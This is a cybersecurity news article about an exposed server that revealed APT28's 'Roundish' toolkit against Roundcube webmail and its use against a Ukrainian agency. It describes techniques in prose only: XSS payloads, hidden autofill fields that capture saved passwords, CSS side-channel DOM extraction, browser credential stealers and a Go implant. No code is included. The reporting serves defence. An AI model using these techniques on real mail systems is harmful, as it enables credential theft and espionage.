Inside the Arsenal: Exposed Server Reveals APT28’s ‘Roundish’ Toolkit and Advanced Cyber Espionage Tactics

Cybersecurity investigators at Hunt Intelligence discovers an exposed open directory that unmasks the inner workings of one of the world’s most notorious threat actors. The find provides a rare, unfiltered look into a complete exploitation toolkit dubbed “Roundish,” attributed with high confidence to APT28 (also known as Fancy Bear), the military intelligence arm of Russia’s GRU.

In January 2026, researchers identified an open directory on a server hosted in Arizona that contained everything an operative needs for a high-stakes espionage campaign. From Flask-based command-and-control (C2) servers to operator bash histories, the directory exposed the group’s “development and production XSS payloads” and a “Go-based implant” used for long-term persistence.

As the report notes: “The recovered files provide visibility into how this toolkit was built, tested, and deployed“.

The Roundish toolkit is surgically designed to compromise Roundcube, a widely used webmail platform. Once a victim opens a malicious email, the toolkit executes six operations simultaneously, ranging from bulk email theft to the extraction of two-factor authentication (2FA) secrets.

One of the most distinctive techniques involves a high-tech “sleight of hand” to steal passwords. The toolkit injects invisible username and password fields into the victim’s browser, then captures whatever the browser’s password manager auto-fills.

While APT28 is a known quantity, Roundish introduces several “previously unknown additions” to their public playbook.

• CSS Side-Channel Attacks: Using a dedicated Node.js server, the group can “progressively extract characters from Roundcube’s DOM” without needing to inject a single line of JavaScript into the page.
• Browser Credential Stealers: The toolkit has expanded beyond webmail to target Chrome and Firefox credentials directly.
• The “httd” Linux Implant: A sophisticated 5.2 MB Go-based binary that provides persistence on everything from standard Linux to advanced SELinux-enforcing systems.

“This level of containerization awareness indicates the operator regularly encounters Docker and Kubernetes environments,” the report writes.

The evidence found on the server wasn’t just theoretical; it contained direct proof of active operations. Analysts identified significant targeting of the Ukrainian State Migration Service (DMSU). The operator’s bash history showed them running reconnaissance commands against the agency’s mail server and even exfiltrating a “42 MB multi-page scanned document” likely stolen from a victim organization.

The Roundish discovery proves that APT28 remains a highly adaptable and dangerous cluster. By using “purpose-built operational identities” like the advenwolf@proton.me dead drop for stolen data, they ensure their exfiltration traffic remains “indistinguishable from legitimate email forwarding”.